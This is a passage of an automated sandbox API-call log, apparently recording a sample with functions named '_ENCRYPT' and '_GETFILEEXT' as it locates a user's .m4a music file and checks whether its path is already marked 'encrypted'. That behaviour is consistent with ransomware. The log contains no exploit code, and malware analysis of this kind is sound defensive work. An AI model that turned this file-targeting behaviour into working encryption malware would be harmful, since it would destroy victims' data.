hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0038.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0038.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0038.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0038.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0038.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0038.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.998] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0038.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.998] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0038.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0038.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0038.999] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0038.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0038.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0038.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0038.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0038.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0038.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0038.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0038.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0038.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0038.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0038.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.999] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0038.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0038.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0039.000] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0039.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0039.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0039.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0039.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0039.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.000] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cce8 [0039.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88cce8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0039.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.001] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0039.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0039.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0039.001] CloseHandle (hObject=0x140) returned 1 [0039.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0039.001] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0039.001] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0039.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0039.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0039.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0039.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0039.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0039.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0039.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0039.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0039.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.002] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0039.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.002] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.002] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.002] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0039.002] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.002] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0039.002] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0039.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.002] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.002] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.002] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.002] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.002] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcff3990, ftCreationTime.dwHighDateTime=0x1d5b921, ftLastAccessTime.dwLowDateTime=0x3058f6a0, ftLastAccessTime.dwHighDateTime=0x1d5c0e8, ftLastWriteTime.dwLowDateTime=0x3058f6a0, ftLastWriteTime.dwHighDateTime=0x1d5c0e8, nFileSizeHigh=0x0, nFileSizeLow=0x3c1a, dwReserved0=0x0, dwReserved1=0x777648, cFileName="GR_-.m4a", cAlternateFileName="")) returned 0x7c20c0 [0039.003] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.003] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.003] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcff3990, ftCreationTime.dwHighDateTime=0x1d5b921, ftLastAccessTime.dwLowDateTime=0x3058f6a0, ftLastAccessTime.dwHighDateTime=0x1d5c0e8, ftLastWriteTime.dwLowDateTime=0x3058f6a0, ftLastWriteTime.dwHighDateTime=0x1d5c0e8, nFileSizeHigh=0x0, nFileSizeLow=0x3c1a, dwReserved0=0x0, dwReserved1=0x777648, cFileName="GR_-.m4a", cAlternateFileName="")) returned 0x7c20c0 [0039.003] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.003] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.003] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zpoE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="poE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oE-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XwzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wzeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zeBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eBvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BvpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.004] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vpPNc\\GR_-.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) 